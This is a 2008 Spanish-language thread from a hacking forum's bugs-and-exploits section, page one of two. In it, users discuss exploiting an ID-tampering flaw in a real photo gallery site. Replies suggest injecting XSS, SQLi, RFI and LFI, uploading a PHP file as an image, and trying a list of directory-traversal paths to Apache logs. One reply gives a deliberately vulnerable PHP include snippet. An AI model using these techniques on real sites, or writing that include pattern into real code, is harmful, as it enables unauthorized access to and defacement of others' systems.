elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 08:38  


Tema destacado: Recuperar cuenta de Google, GMail, Youtube

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Como explotar bugs de permisos
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Como explotar bugs de permisos  (Leído 6,050 veces)
SpiderNet

Desconectado Desconectado

Mensajes: 149


No abuses de tus conocimientos


Ver Perfil WWW
Como explotar bugs de permisos
« en: 5 Octubre 2008, 05:19 »

En la red encontre una web de galería, de esas de guardar fotos.

Esta web tiene un sistema de registro de usuarios.

Para poder subir las fotos debes loguearte, igualmente a la hora de modificarlas o eliminarlas.

Lo cierto es que cuando modifique la descripcion de una de mis fotos, vi en la barra del navegador algo como... http://www.webgaleria/modificaimagen.php?codfoto=267

Entonces en el navegador copie lo mismo pero le cambie los numeros que es de suponerse es el codigo interno de la foto. Y la web me mostro una foto de otro usuario y podia modificarla o eliminarla desde las opciones de la web.

Asi puedo ir colocando diferentes numeros y me mostrara mas fotos.

Ahora bien. Este bug es grave, pienso yo.

Que peligro corre esta web. Y de que manera podrian tomar el control de ella o defacearla???


Saludos!!!
P.D. Cambia los datos reales de la web. La de arrriba es solo un ejemplo.
« Última modificación: 3 Diciembre 2008, 09:13 por sirdarckcat » En línea

Quieres un foro solo para principiantes
Visita  http://spidernet.forumotion.com

El miedo es libre, puedes sentirlo....
Eazy

Desconectado Desconectado

Mensajes: 229


Eazy [FM-Team]


Ver Perfil WWW
Re: Como explotar este bugs ???
« Respuesta #1 en: 5 Octubre 2008, 05:54 »

AHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAH eso no es un buggg :xD ahaha
En línea

[/url]
oPen syLar


Desconectado Desconectado

Mensajes: 686


The Best of You..


Ver Perfil WWW
Re: Como explotar este bugs ???
« Respuesta #2 en: 5 Octubre 2008, 08:41 »

AHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAHAHAHHAHAHAHAHAH eso no es un buggg :xD ahaha

 :huh: porque dices que no es un bug...?


Spider la web podria decirte que la haz borrado... pero en verdad.. lo hace..??
En línea

framework C++ http://bit.ly/AB0Qz1
worm C++ http://bit.ly/AdWRtl
POP3 cracker http://bit.ly/x2SZxW
Mail dumper (HTTP) http://bit.ly/xMN6pF
SpiderNet

Desconectado Desconectado

Mensajes: 149


No abuses de tus conocimientos


Ver Perfil WWW
Re: Como explotar este bugs ???
« Respuesta #3 en: 5 Octubre 2008, 16:24 »

http://es.wiktionary.org/wiki/bug

1 En Informática,
   Error o anomalía en el código de un programa informático

Es que tu crees que esa Web fue diseñada para que un usuario pueda borrar los registros de otro???

Es obvio que no.

Por lo tanto es un error en el código.

Si alguien conoce los riesgos que corre esa web por favor informelo.


Saludos!!!
En línea

Quieres un foro solo para principiantes
Visita  http://spidernet.forumotion.com

El miedo es libre, puedes sentirlo....
berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.140



Ver Perfil
Re: Como explotar este bugs ???
« Respuesta #4 en: 6 Octubre 2008, 18:18 »

Intentaste romper el flujo con mas datos?

Código:
/modificaimagen.php?codfoto=[XSS, SQLi, RFI, LFI, Traversal, etc etc]

-berz3k.
En línea
s E t H

Desconectado Desconectado

Mensajes: 151


Ha tenido un sueño donde todos los pollos eran libres de cruzar una carretera sin tener que justificar sus actos.


Ver Perfil WWW
Re: Como explotar este bugs ???
« Respuesta #5 en: 7 Octubre 2008, 23:21 »


Si alguien conoce los riesgos que corre esa web por favor informelo.


Saludos!!!

corre riesgo de que alguien borre las fotos de otro xD

proba lo que dijo berz3k, y tambien fijate si podes subir un php en lugar de una imagen
En línea

Eazy

Desconectado Desconectado

Mensajes: 229


Eazy [FM-Team]


Ver Perfil WWW
Re: Como explotar este bugs ???
« Respuesta #6 en: 8 Octubre 2008, 05:07 »

Berz3k, me explicas un poco lo de Transversal?
En línea

[/url]
berz3k
Moderador
***
Desconectado Desconectado

Mensajes: 1.140



Ver Perfil
Re: Como explotar este bugs ???
« Respuesta #7 en: 8 Octubre 2008, 17:34 »

Directory Traversal, mediante un fuzzer o manualmente, intentar "recorrer" directorios (relativos o no relativos), para encontrar y/o alcanzar archivos del propio filesystem ademas de leer archivos de la propia configuracion.

e.g.

Código:
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"


-berz3k.
En línea
Azielito
no es
CoAdmin
***
Desconectado Desconectado

Mensajes: 9.114


>.<


Ver Perfil WWW
Re: Como explotar este bugs ???
« Respuesta #8 en: 10 Octubre 2008, 19:23 »

entonces, es diferente LFI a Directory Traversal? o ando mesclando conceptos?
En línea

Eazy

Desconectado Desconectado

Mensajes: 229


Eazy [FM-Team]


Ver Perfil WWW
Re: Como explotar este bugs ???
« Respuesta #9 en: 11 Octubre 2008, 17:30 »

ahhh, gracias berz3k,

@Azielito: Creo yo uqe si, LFI es meter un archivo que ejecute php (en este caso una shell podria ser) usando un uploader (ejemplo, "Sube tu foto")

Pero con Directory Traversal, que se puede hacer osea, qe seria lo mas potente qe se haria, leer algun pw algo?
En línea

[/url]
Azielito
no es
CoAdmin
***
Desconectado Desconectado

Mensajes: 9.114


>.<


Ver Perfil WWW
Re: Como explotar este bugs ???
« Respuesta #10 en: 13 Octubre 2008, 19:45 »

ahora entiendo '_'

voy a hacer una aplicacion vulnerable para practicar xD
En línea

Eazy

Desconectado Desconectado

Mensajes: 229


Eazy [FM-Team]


Ver Perfil WWW
Re: Como explotar este bugs ???
« Respuesta #11 en: 14 Octubre 2008, 03:27 »

Azielito, yo tengo una aplicacion vulnerable si necesitas me avisas.
En línea

[/url]
NaSaRiD15


Desconectado Desconectado

Mensajes: 337


..Si habra para aprender..


Ver Perfil
Re: Como explotar este bugs ???
« Respuesta #12 en: 14 Octubre 2008, 03:32 »

A mi me interesa Eazy, tambien ando con ganas de practicar estos temas.

Saludos.
En línea

Hay que tomarse un tiempo para comprender que solamente sos lo que sos, de ahi a todo lo que tu kieras ser, eso ya depende de vos...
Eazy

Desconectado Desconectado

Mensajes: 229


Eazy [FM-Team]


Ver Perfil WWW
Re: Como explotar este bugs ???
« Respuesta #13 en: 14 Octubre 2008, 11:26 »

Bueno para hacer una aplicacion vulnerable a RFI tienen que poner:
Código
<?
Include($eazy);
?>
 
Que pasa?
Si la variable Eazy no esta definida? esto hace que nosotros podamos incluir cualquier cosa.
Por que?
Por que al estar indefinida en el php, podemos definirla nosotros mismos desde el explorador.
Como?
Hariamos..
Código:
www.mihosting.com/archivovulnerable.php?eazy=http://google.com
con lo que el codigo php que ejecute la web seria:
Código
<?
Include($eazy);
?>
 

Despues hago una breve explicacion de LFI, y una aplicacion vulnerable en mi host, suerte.
En línea

[/url]
Capitan_Halcón

Desconectado Desconectado

Mensajes: 44



Ver Perfil
Re: Como explotar este bugs ???
« Respuesta #14 en: 14 Octubre 2008, 15:19 »

Excelente post, jeje ;D, bueno, creo que deberian meter en wargames o aqui mismo unas cuantas paginas vulnerables, y un tutorial de todo tipo de ataques PHP y SQL, gracias de todas formas por los datos.

 ;D
En línea
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Como Explotar Windows 7 Con BackTrack 5??
Bugs y Exploits
compuchiqui 14 1,098 Último mensaje 19 Mayo 2012, 02:20
por compuchiqui
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines